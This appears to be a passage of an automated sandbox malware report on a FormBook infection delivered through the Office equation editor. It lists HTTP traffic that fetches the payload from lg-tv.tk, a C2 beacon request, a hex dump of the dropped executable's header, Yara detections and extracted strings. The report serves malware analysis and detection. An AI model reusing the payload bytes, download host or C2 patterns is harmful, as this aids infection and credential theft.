HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 13:20:59 GMTContent-Type: application/x-msdownloadContent-Length: 854528Last-Modified: Mon, 27 Sep 2021 01:40:35 GMTConnection: keep-aliveETag: "61512113-d0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a5 12 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 70 0b 00 00 98 01 00 00 00 00 00 de 8f 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 8f 0b 00 4f 00 00 00 00 a0 0b 00 3c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 6f 0b 00 00 20 00 00 00 70 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 3c 94 01 00 00 a0 0b 00 00 96 01 00 00 72 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0d 00 00 02 00 00 00 08 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 8f 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 1c 53 02 00 03 00 00 00 8c 02 00 06 04 20 04 00 88 6f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02

Source: global traffic

HTTP traffic detected: GET /obinnazx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive

Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.452943975.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.428379026.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoi
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoq
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehped2
Source: explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp#
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: obinnamaxdw2962.exe, obinnamaxdw2962.exe, 00000005.00000000.424542782.00000000009E2000.00000020.00020000.sdmp, cmmon32.exe, 00000007.00000002.683308927.000000000261F000.00000004.00020000.sdmp, obinnamaxdw2962.exe.2.dr	String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.428495981.000000000031D000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1J
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1b
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: cmmon32.exe, 00000007.00000002.683753040.0000000002B0F000.00000004.00020000.sdmp	String found in binary or memory: https://www.netexplorer.fr/

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A9A4A70D-764F-4C80-824C-4FCC7297AA70}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: lg-tv.tk

Source: global traffic	HTTP traffic detected: GET /obinnazx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== HTTP/1.1Host: www.islamic-coins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe			Jump to dropped file

.NET source code contains very large strings

Show sources

Source: obinnamaxdw2962.exe.2.dr, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 4.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 5.2.obinnamaxdw2962.exe.9e0000.3.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816
Source: 5.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/SearchResults.cs	Long String: Length: 34816

Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_003600F0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_003669C9
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00366D30
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00369160
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00369150
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00366D21
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00369668
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_00369659
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_042B6788
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_042B246B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_042B0048
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_042B5BB8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041E87B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00401027
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00401030
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041E5E8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00409E60
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041E606
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041D6E7
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AEE0C6
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B1D005
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B0905A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF3040
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AEE2E9
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B91238
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AEF3CF
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B163DB
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF2305
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B3A37B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF7353
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B25485
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B01489
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B0C5F0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF351F
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF4680
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AFE6C1
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B92622
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AFC7BC
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B7579A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B257C3
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B8F8EE
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B1286D
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AFC85C
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF29B2
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B9098E
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B069FE
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B75955
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00BA3A83
